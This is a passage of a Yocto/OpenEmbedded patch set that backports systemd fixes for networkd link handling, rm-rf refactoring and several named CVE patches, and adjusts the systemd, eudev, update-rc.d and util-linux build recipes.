171+ _cleanup_free_ char *ifname = NULL, *kind = NULL;
172+ int r, ifindex;
173+ unsigned short iftype;
174+
175+ assert(manager);
176+ assert(message);
177+ assert(ret);
178+
179+ r = sd_netlink_message_get_type(message, &type);
180+ if (r < 0)
181+ return r;
182+ else if (type != RTM_NEWLINK)
183+ return -EINVAL;
184+
185+ r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
186+ if (r < 0)
187+ return r;
188+ else if (ifindex <= 0)
189+ return -EINVAL;
190+
191+ r = sd_rtnl_message_link_get_type(message, &iftype);
192+ if (r < 0)
193+ return r;
194+
195+ r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname);
196+ if (r < 0)
197+ return r;
198+
199+ /* check for link kind */
200+ r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
201+ if (r >= 0) {
202+ (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind);
203+ r = sd_netlink_message_exit_container(message);
204+ if (r < 0)
205+ return r;
206+ }
207+
208+ link = new(Link, 1);
209+ if (!link)
210+ return -ENOMEM;
211+
212+ *link = (Link) {
213+ .n_ref = 1,
214+ .state = LINK_STATE_PENDING,
215+ .ifindex = ifindex,
216+ .iftype = iftype,
217+ .ifname = TAKE_PTR(ifname),
218+ .kind = TAKE_PTR(kind),
219+
220+ .n_dns = (unsigned) -1,
221+ .dns_default_route = -1,
222+ .llmnr = _RESOLVE_SUPPORT_INVALID,
223+ .mdns = _RESOLVE_SUPPORT_INVALID,
224+ .dnssec_mode = _DNSSEC_MODE_INVALID,
225+ .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
226+ };
227+
228+ r = hashmap_ensure_allocated(&manager->links, NULL);
229+ if (r < 0)
230+ return r;
231+
232+ r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
233+ if (r < 0)
234+ return r;
235+
236+ link->manager = manager;
237+
238+ r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex);
239+ if (r < 0)
240+ log_link_debug_errno(link, r, "New device has no master, continuing without");
241+
242+ r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
243+ if (r < 0)
244+ log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
245+
246+ if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
247+ return -ENOMEM;
248+
249+ if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
250+ return -ENOMEM;
251+
252+ if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
253+ return -ENOMEM;
254+
255+ r = link_update_flags(link, message, false);
256+ if (r < 0)
257+ return r;
258+
259+ *ret = TAKE_PTR(link);
260+
261+ return 0;
262+}
263
264 int link_add(Manager *m, sd_netlink_message *message, Link **ret) {
265 _cleanup_(sd_device_unrefp) sd_device *device = NULL;
266
267--- a/src/network/networkd-link.h 2021-09-02 18:04:16.900542857 +0530
268+++ b/src/network/networkd-link.h 2021-09-02 18:18:56.776571563 +0530
269@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d
270
271 int link_get(Manager *m, int ifindex, Link **ret);
272 int link_add(Manager *manager, sd_netlink_message *message, Link **ret);
273-void link_drop(Link *link);
274+Link *link_drop(Link *link);
275
276 int link_down(Link *link, link_netlink_message_handler_t callback);
277
278
diff --git a/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
new file mode 100644
index 0000000000..65bdc611df
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
@@ -0,0 +1,67 @@
1From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001
2From: Yu Watanabe <watanabe.yu+github@gmail.com>
3Date: Mon, 17 May 2021 15:40:15 +0900
4Subject: [PATCH] network: merge link_drop() and link_detach_from_manager()
5
6link_detach_from_manager() is only called by link_drop(). It is not
7necessary to split such tiny function.
8
9Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf]
10Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
11
12---
13 src/network/networkd-link.c | 27 ++++++++++++---------------
14 1 file changed, 12 insertions(+), 15 deletions(-)
15
16diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
17index 9d30e16b0a..67d01ac44d 100644
18--- a/src/network/networkd-link.c
19+++ b/src/network/networkd-link.c
20@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
21 link_unref(set_remove(master->slaves, link));
22 }
23
24-static void link_detach_from_manager(Link *link) {
25- if (!link || !link->manager)
26- return;
27-
28- link_unref(set_remove(link->manager->links_requesting_uuid, link));
29- link_clean(link);
30-
31- /* The following must be called at last. */
32- assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
33- link_unref(link);
34-}
35-
36 void link_drop(Link *link) {
37- if (!link || link->state == LINK_STATE_LINGER)
38+ if (!link)
39 return;
40
41+ assert(link->manager);
42+
43 link_set_state(link, LINK_STATE_LINGER);
44
45+ /* Drop all references from other links and manager. Note that async netlink calls may have
46+ * references to the link, and they will be dropped when we receive replies. */
47+
48 link_free_carrier_maps(link);
49
50 if (link->network) {
51@@ -2044,10 +2037,14 @@ void link_drop(Link *link) {
52 link_drop_from_master(link, link->network->bond);
53 }
54
55- log_link_debug(link, "Link removed");
56+ link_unref(set_remove(link->manager->links_requesting_uuid, link));
57
58 (void) unlink(link->state_file);
59- link_detach_from_manager(link);
60+ link_clean(link);
61+
62+ /* The following must be called at last. */
63+ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
64+ link_unref(link);
65 }
66
67 static int link_joined(Link *link) {
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
new file mode 100644
index 0000000000..b860da008c
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
@@ -0,0 +1,35 @@
1Backport of the following upstream commit:
2From bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2 Mon Sep 17 00:00:00 2001
3From: Lennart Poettering <lennart@poettering.net>
4Date: Tue, 5 Oct 2021 10:32:56 +0200
5Subject: [PATCH] rm-rf: optionally fsync() after removing directory tree
6
7Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
8Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
9---
10 src/basic/rm-rf.c | 3 +++
11 src/basic/rm-rf.h | 1 +
12 2 files changed, 4 insertions(+)
13
14--- a/src/basic/rm-rf.c
15+++ b/src/basic/rm-rf.c
16@@ -161,6 +161,9 @@
17 ret = r;
18 }
19
20+ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
21+ ret = -errno;
22+
23 return ret;
24 }
25
26--- a/src/basic/rm-rf.h
27+++ b/src/basic/rm-rf.h
28@@ -11,6 +11,7 @@
29 REMOVE_PHYSICAL = 1 << 2, /* If not set, only removes files on tmpfs, never physical file systems */
30 REMOVE_SUBVOLUME = 1 << 3, /* Drop btrfs subvolumes in the tree too */
31 REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
32+ REMOVE_SYNCFS = 1 << 7, /* syncfs() the root of the specified directory after removing everything in it */
33 } RemoveFlags;
34
35 int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
new file mode 100644
index 0000000000..f80e6433c6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
@@ -0,0 +1,318 @@
1Backport of the following upstream commit:
2From 96906b22417c65d70933976e0ee920c70c9113a4 Mon Sep 17 00:00:00 2001
3From: Lennart Poettering <lennart@poettering.net>
4Date: Tue, 26 Jan 2021 16:30:06 +0100
5Subject: [PATCH] rm-rf: refactor rm_rf_children(), split out body of directory
6 iteration loop
7
8This splits out rm_rf_children_inner() as body of the loop. We can use
9that to implement rm_rf_child() for deleting one specific entry in a
10directory.
11
12Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
13Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
14---
15 src/basic/rm-rf.c | 223 ++++++++++++++++++++++++++-------------------
16 src/basic/rm-rf.h | 3 +-
17 2 files changed, 131 insertions(+), 95 deletions(-)
18
19--- a/src/basic/rm-rf.c
20+++ b/src/basic/rm-rf.c
21@@ -19,138 +19,153 @@
22 #include "stat-util.h"
23 #include "string-util.h"
24
25+/* We treat tmpfs/ramfs + cgroupfs as non-physical file sytems. cgroupfs is similar to tmpfs in a way after
26+ * all: we can create arbitrary directory hierarchies in it, and hence can also use rm_rf() on it to remove
27+ * those again. */
28 static bool is_physical_fs(const struct statfs *sfs) {
29 return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
30 }
31
32-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev) {
33+static int rm_rf_children_inner(
34+ int fd,
35+ const char *fname,
36+ int is_dir,
37+ RemoveFlags flags,
38+ const struct stat *root_dev) {
39+
40+ struct stat st;
41+ int r;
42+
43+ assert(fd >= 0);
44+ assert(fname);
45+
46+ if (is_dir < 0 || (is_dir > 0 && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
47+
48+ r = fstatat(fd, fname, &st, AT_SYMLINK_NOFOLLOW);
49+ if (r < 0)
50+ return r;
51+
52+ is_dir = S_ISDIR(st.st_mode);
53+ }
54+
55+ if (is_dir) {
56+ _cleanup_close_ int subdir_fd = -1;
57+ int q;
58+
59+ /* if root_dev is set, remove subdirectories only if device is same */
60+ if (root_dev && st.st_dev != root_dev->st_dev)
61+ return 0;
62+
63+ /* Stop at mount points */
64+ r = fd_is_mount_point(fd, fname, 0);
65+ if (r < 0)
66+ return r;
67+ if (r > 0)
68+ return 0;
69+
70+ if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
71+
72+ /* This could be a subvolume, try to remove it */
73+
74+ r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
75+ if (r < 0) {
76+ if (!IN_SET(r, -ENOTTY, -EINVAL))
77+ return r;
78+
79+ /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
80+ } else
81+ /* It was a subvolume, done. */
82+ return 1;
83+ }
84+
85+ subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
86+ if (subdir_fd < 0)
87+ return -errno;
88+
89+ /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
90+ * again for each directory */
91+ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
92+
93+ r = unlinkat(fd, fname, AT_REMOVEDIR);
94+ if (r < 0)
95+ return r;
96+ if (q < 0)
97+ return q;
98+
99+ return 1;
100+
101+ } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
102+ r = unlinkat(fd, fname, 0);
103+ if (r < 0)
104+ return r;
105+
106+ return 1;
107+ }
108+
109+ return 0;
110+}
111+
112+int rm_rf_children(
113+ int fd,
114+ RemoveFlags flags,
115+ const struct stat *root_dev) {
116+
117 _cleanup_closedir_ DIR *d = NULL;
118 struct dirent *de;
119 int ret = 0, r;
120- struct statfs sfs;
121
122 assert(fd >= 0);
123
124 /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
125- * fd, in all cases, including on failure.. */
126+ * fd, in all cases, including on failure. */
127+
128+ d = fdopendir(fd);
129+ if (!d) {
130+ safe_close(fd);
131+ return -errno;
132+ }
133
134 if (!(flags & REMOVE_PHYSICAL)) {
135+ struct statfs sfs;
136
137- r = fstatfs(fd, &sfs);
138- if (r < 0) {
139- safe_close(fd);
140+ if (fstatfs(dirfd(d), &sfs) < 0)
141 return -errno;
142 }
143
144 if (is_physical_fs(&sfs)) {
145- /* We refuse to clean physical file systems with this call,
146- * unless explicitly requested. This is extra paranoia just
147- * to be sure we never ever remove non-state data. */
148+ /* We refuse to clean physical file systems with this call, unless explicitly
149+ * requested. This is extra paranoia just to be sure we never ever remove non-state
150+ * data. */
151+
152 _cleanup_free_ char *path = NULL;
153
154 (void) fd_get_path(fd, &path);
155- log_error("Attempted to remove disk file system under \"%s\", and we can't allow that.",
156- strna(path));
157-
158- safe_close(fd);
159- return -EPERM;
160+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
161+ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
162+ strna(path));
163 }
164 }
165
166- d = fdopendir(fd);
167- if (!d) {
168- safe_close(fd);
169- return errno == ENOENT ? 0 : -errno;
170- }
171-
172 FOREACH_DIRENT_ALL(de, d, return -errno) {
173- bool is_dir;
174- struct stat st;
175+ int is_dir;
176
177 if (dot_or_dot_dot(de->d_name))
178 continue;
179
180- if (de->d_type == DT_UNKNOWN ||
181- (de->d_type == DT_DIR && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
182- if (fstatat(fd, de->d_name, &st, AT_SYMLINK_NOFOLLOW) < 0) {
183- if (ret == 0 && errno != ENOENT)
184- ret = -errno;
185- continue;
186- }
187-
188- is_dir = S_ISDIR(st.st_mode);
189- } else
190- is_dir = de->d_type == DT_DIR;
191-
192- if (is_dir) {
193- _cleanup_close_ int subdir_fd = -1;
194-
195- /* if root_dev is set, remove subdirectories only if device is same */
196- if (root_dev && st.st_dev != root_dev->st_dev)
197- continue;
198-
199- subdir_fd = openat(fd, de->d_name, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
200- if (subdir_fd < 0) {
201- if (ret == 0 && errno != ENOENT)
202- ret = -errno;
203- continue;
204- }
205-
206- /* Stop at mount points */
207- r = fd_is_mount_point(fd, de->d_name, 0);
208- if (r < 0) {
209- if (ret == 0 && r != -ENOENT)
210- ret = r;
211-
212- continue;
213- }
214- if (r > 0)
215- continue;
216-
217- if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
218-
219- /* This could be a subvolume, try to remove it */
220-
221- r = btrfs_subvol_remove_fd(fd, de->d_name, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
222- if (r < 0) {
223- if (!IN_SET(r, -ENOTTY, -EINVAL)) {
224- if (ret == 0)
225- ret = r;
226-
227- continue;
228- }
229-
230- /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
231- } else
232- /* It was a subvolume, continue. */
233- continue;
234- }
235-
236- /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file
237- * system type again for each directory */
238- r = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
239- if (r < 0 && ret == 0)
240- ret = r;
241-
242- if (unlinkat(fd, de->d_name, AT_REMOVEDIR) < 0) {
243- if (ret == 0 && errno != ENOENT)
244- ret = -errno;
245- }
246-
247- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
248-
249- if (unlinkat(fd, de->d_name, 0) < 0) {
250- if (ret == 0 && errno != ENOENT)
251- ret = -errno;
252- }
253- }
254+ is_dir =
255+ de->d_type == DT_UNKNOWN ? -1 :
256+ de->d_type == DT_DIR;
257+
258+ r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
259+ if (r < 0 && r != -ENOENT && ret == 0)
260+ ret = r;
261 }
262+
263 return ret;
264 }
265
266 int rm_rf(const char *path, RemoveFlags flags) {
267 int fd, r;
268- struct statfs s;
269
270 assert(path);
271
272@@ -195,9 +210,10 @@
273 if (FLAGS_SET(flags, REMOVE_ROOT)) {
274
275 if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
276+ struct statfs s;
277+
278 if (statfs(path, &s) < 0)
279 return -errno;
280-
281 if (is_physical_fs(&s))
282 return log_error_errno(SYNTHETIC_ERRNO(EPERM),
283 "Attempted to remove files from a disk file system under \"%s\", refusing.",
284@@ -225,3 +241,22 @@
285
286 return r;
287 }
288+
289+int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
290+
291+ /* Removes one specific child of the specified directory */
292+
293+ if (fd < 0)
294+ return -EBADF;
295+
296+ if (!filename_is_valid(name))
297+ return -EINVAL;
298+
299+ if ((flags & (REMOVE_ROOT|REMOVE_MISSING_OK)) != 0) /* Doesn't really make sense here, we are not supposed to remove 'fd' anyway */
300+ return -EINVAL;
301+
302+ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
303+ return -EINVAL;
304+
305+ return rm_rf_children_inner(fd, name, -1, flags, NULL);
306+}
307--- a/src/basic/rm-rf.h
308+++ b/src/basic/rm-rf.h
309@@ -13,7 +13,8 @@
310 REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
311 } RemoveFlags;
312
313-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev);
314+int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
315+int rm_rf_child(int fd, const char *name, RemoveFlags flags);
316 int rm_rf(const char *path, RemoveFlags flags);
317
318 /* Useful for usage with _cleanup_(), destroys a directory and frees the pointer */
diff --git a/meta/recipes-core/systemd/systemd/systemd-pager.sh b/meta/recipes-core/systemd/systemd/systemd-pager.sh
new file mode 100644
index 0000000000..86e3e0ab78
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/systemd-pager.sh
@@ -0,0 +1,7 @@
1# Systemd expect a color capable pager, however the less provided
2# by busybox is not. This make many interaction with systemd pretty
3# annoying. As a workaround we disable the systemd pager if less
4# is not the GNU version.
5if ! less -V > /dev/null 2>&1 ; then
6 export SYSTEMD_PAGER=
7fi
diff --git a/meta/recipes-core/systemd/systemd_244.5.bb b/meta/recipes-core/systemd/systemd_244.5.bb
index 8c95648ca0..8b2f47b92f 100644
--- a/meta/recipes-core/systemd/systemd_244.5.bb
+++ b/meta/recipes-core/systemd/systemd_244.5.bb
@@ -18,8 +18,28 @@ SRC_URI += "file://touchscreen.rules \
18 file://00-create-volatile.conf \ 18 file://00-create-volatile.conf \
19 file://init \ 19 file://init \
20 file://99-default.preset \ 20 file://99-default.preset \
21 file://systemd-pager.sh \
21 file://0001-binfmt-Don-t-install-dependency-links-at-install-tim.patch \ 22 file://0001-binfmt-Don-t-install-dependency-links-at-install-tim.patch \
22 file://0003-implment-systemd-sysv-install-for-OE.patch \ 23 file://0003-implment-systemd-sysv-install-for-OE.patch \
24 file://CVE-2021-33910.patch \
25 file://CVE-2020-13529.patch \
26 file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \
27 file://introduce-ordered_set_clear-free-with-destructor.patch \
28 file://network-add-skeleton-of-request-queue.patch \
29 file://network-merge-link_drop-and-link_detach_from_manager.patch \
30 file://network-also-drop-requests-when-link-enters-linger-state.patch \
31 file://network-fix-Link-reference-counter-issue.patch \
32 file://rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch \
33 file://rm-rf-optionally-fsync-after-removing-directory-tree.patch \
34 file://CVE-2018-21029.patch \
35 file://CVE-2021-3997-1.patch \
36 file://CVE-2021-3997-2.patch \
37 file://CVE-2021-3997-3.patch \
38 file://CVE-2022-3821.patch \
39 file://CVE-2023-26604-1.patch \
40 file://CVE-2023-26604-2.patch \
41 file://CVE-2023-26604-3.patch \
42 file://CVE-2023-26604-4.patch \
23 " 43 "
24 44
25# patches needed by musl 45# patches needed by musl
@@ -88,6 +108,7 @@ PACKAGECONFIG ??= " \
88 timesyncd \ 108 timesyncd \
89 utmp \ 109 utmp \
90 vconsole \ 110 vconsole \
111 wheel-group \
91 xz \ 112 xz \
92" 113"
93 114
@@ -148,6 +169,7 @@ PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native xmlto-native do
148PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd" 169PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd"
149PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname" 170PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname"
150PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false" 171PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false"
172PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers="
151PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false" 173PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false"
152PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false" 174PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false"
153PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false" 175PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false"
@@ -180,6 +202,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true"
180PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false" 202PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false"
181PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind" 203PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind"
182PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup" 204PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup"
205PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false"
183# Verify keymaps on locale change 206# Verify keymaps on locale change
184PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon" 207PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon"
185PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz" 208PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz"
@@ -197,10 +220,12 @@ rootlibexecdir = "${rootprefix}/lib"
197EXTRA_OEMESON += "-Dlink-udev-shared=false" 220EXTRA_OEMESON += "-Dlink-udev-shared=false"
198 221
199EXTRA_OEMESON += "-Dnobody-user=nobody \ 222EXTRA_OEMESON += "-Dnobody-user=nobody \
200 -Dnobody-group=nobody \ 223 -Dnobody-group=nogroup \
201 -Drootlibdir=${rootlibdir} \ 224 -Drootlibdir=${rootlibdir} \
202 -Drootprefix=${rootprefix} \ 225 -Drootprefix=${rootprefix} \
203 -Ddefault-locale=C \ 226 -Ddefault-locale=C \
227 -Dsystem-uid-max=999 \
228 -Dsystem-gid-max=999 \
204 " 229 "
205 230
206# Hardcode target binary paths to avoid using paths from sysroot 231# Hardcode target binary paths to avoid using paths from sysroot
@@ -298,6 +323,9 @@ do_install() {
298 # install default policy for presets 323 # install default policy for presets
299 # https://www.freedesktop.org/wiki/Software/systemd/Preset/#howto 324 # https://www.freedesktop.org/wiki/Software/systemd/Preset/#howto
300 install -Dm 0644 ${WORKDIR}/99-default.preset ${D}${systemd_unitdir}/system-preset/99-default.preset 325 install -Dm 0644 ${WORKDIR}/99-default.preset ${D}${systemd_unitdir}/system-preset/99-default.preset
326
327 # add a profile fragment to disable systemd pager with busybox less
328 install -Dm 0644 ${WORKDIR}/systemd-pager.sh ${D}${sysconfdir}/profile.d/systemd-pager.sh
301} 329}
302 330
303python populate_packages_prepend (){ 331python populate_packages_prepend (){
@@ -385,9 +413,9 @@ FILES_${PN}-binfmt = "${sysconfdir}/binfmt.d/ \
385 ${rootlibexecdir}/systemd/systemd-binfmt \ 413 ${rootlibexecdir}/systemd/systemd-binfmt \
386 ${systemd_unitdir}/system/proc-sys-fs-binfmt_misc.* \ 414 ${systemd_unitdir}/system/proc-sys-fs-binfmt_misc.* \
387 ${systemd_unitdir}/system/systemd-binfmt.service" 415 ${systemd_unitdir}/system/systemd-binfmt.service"
388RRECOMMENDS_${PN}-binfmt = "kernel-module-binfmt-misc" 416RRECOMMENDS_${PN}-binfmt = "${@bb.utils.contains('PACKAGECONFIG', 'binfmt', 'kernel-module-binfmt-misc', '', d)}"
389 417
390RRECOMMENDS_${PN}-vconsole-setup = "kbd kbd-consolefonts kbd-keymaps" 418RRECOMMENDS_${PN}-vconsole-setup = "${@bb.utils.contains('PACKAGECONFIG', 'vconsole', 'kbd kbd-consolefonts kbd-keymaps', '', d)}"
391 419
392 420
393FILES_${PN}-journal-gatewayd = "${rootlibexecdir}/systemd/systemd-journal-gatewayd \ 421FILES_${PN}-journal-gatewayd = "${rootlibexecdir}/systemd/systemd-journal-gatewayd \
@@ -520,6 +548,7 @@ FILES_${PN} = " ${base_bindir}/* \
520 ${sysconfdir}/dbus-1/ \ 548 ${sysconfdir}/dbus-1/ \
521 ${sysconfdir}/modules-load.d/ \ 549 ${sysconfdir}/modules-load.d/ \
522 ${sysconfdir}/pam.d/ \ 550 ${sysconfdir}/pam.d/ \
551 ${sysconfdir}/profile.d/ \
523 ${sysconfdir}/sysctl.d/ \ 552 ${sysconfdir}/sysctl.d/ \
524 ${sysconfdir}/systemd/ \ 553 ${sysconfdir}/systemd/ \
525 ${sysconfdir}/tmpfiles.d/ \ 554 ${sysconfdir}/tmpfiles.d/ \
diff --git a/meta/recipes-core/udev/eudev_3.2.9.bb b/meta/recipes-core/udev/eudev_3.2.9.bb
index f96f8cbe78..3ae91dee51 100644
--- a/meta/recipes-core/udev/eudev_3.2.9.bb
+++ b/meta/recipes-core/udev/eudev_3.2.9.bb
@@ -1,5 +1,6 @@
1SUMMARY = "eudev is a fork of systemd's udev" 1SUMMARY = "eudev is a fork of systemd's udev"
2HOMEPAGE = "https://wiki.gentoo.org/wiki/Eudev" 2HOMEPAGE = "https://wiki.gentoo.org/wiki/Eudev"
3DESCRIPTION = "eudev is Gentoo's fork of udev, systemd's device file manager for the Linux kernel. It manages device nodes in /dev and handles all user space actions when adding or removing devices."
3LICENSE = "GPLv2.0+ & LGPL-2.1+" 4LICENSE = "GPLv2.0+ & LGPL-2.1+"
4LICENSE_libudev = "LGPL-2.1+" 5LICENSE_libudev = "LGPL-2.1+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" 6LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
index 75632d9434..daee5c224b 100644
--- a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
+++ b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
@@ -6,8 +6,8 @@ SECTION = "base"
6LICENSE = "GPLv2+" 6LICENSE = "GPLv2+"
7LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9" 7LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9"
8 8
9SRC_URI = "git://git.yoctoproject.org/update-rc.d" 9SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master"
10SRCREV = "4b150b25b38de688d25cde2b2d22c268ed65a748" 10SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac"
11 11
12UPSTREAM_CHECK_COMMITS = "1" 12UPSTREAM_CHECK_COMMITS = "1"
13 13
diff --git a/meta/recipes-core/util-linux/util-linux.inc b/meta/recipes-core/util-linux/util-linux.inc
index 0e85603d9a..7b780352be 100644
--- a/meta/recipes-core/util-linux/util-linux.inc
+++ b/meta/recipes-core/util-linux/util-linux.inc
@@ -59,12 +59,13 @@ python util_linux_binpackages () {
59 continue 59 continue
60 60
61 pkg = os.path.basename(os.readlink(file)) 61 pkg = os.path.basename(os.readlink(file))
62 extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1) 62 extras.setdefault(pkg, [])
63 extras[pkg].append(file.replace(dvar, '', 1))
63 64
64 pn = d.getVar('PN') 65 pn = d.getVar('PN')
65 for pkg, links in extras.items(): 66 for pkg, links in extras.items():
66 of = d.getVar('FILES_' + pn + '-' + pkg) 67 of = d.getVar('FILES_' + pn + '-' + pkg)
67 links = of + links 68 links = of + " " + " ".join(sorted(links))
68 d.setVar('FILES_' + pn + '-' + pkg, links) 69 d.setVar('FILES_' + pn + '-' + pkg, links)
69} 70}
70 71
@@ -94,7 +95,7 @@ EXTRA_OECONF = "\
94 \ 95 \
95 --disable-bfs --disable-chfn-chsh --disable-login \ 96 --disable-bfs --disable-chfn-chsh --disable-login \
96 --disable-makeinstall-chown --disable-minix --disable-newgrp \ 97 --disable-makeinstall-chown --disable-minix --disable-newgrp \
97 --disable-use-tty-group --disable-vipw \ 98 --disable-use-tty-group --disable-vipw --disable-raw \
98 \ 99 \
